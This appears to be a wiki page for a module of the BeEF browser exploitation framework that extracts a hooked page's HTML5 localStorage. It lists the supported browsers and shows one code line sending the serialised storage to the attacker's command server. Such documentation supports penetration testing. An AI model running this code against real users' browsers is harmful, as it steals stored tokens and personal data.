Clone
Module: Get Local Storage
Jess Williams edited this page 2019-12-31 15:42:26 +10:00

Summary

  • Objective: Extracts data from the HTML5 localStorage object..
  • Date: ???
  • Authors: bcoles
  • Browsers: Internet Explorer 8+, Firefox 4+, opera 11+, Chrome 4+, Safari 4+
  • Code

Internal Working

This module just gather the localStorage of the page by using window['localStorage'] :

	beef.net.send("<%= @command_url %>", <%= @command_id %>, "localStorage="+JSON.stringify(window['localStorage']));

Feedback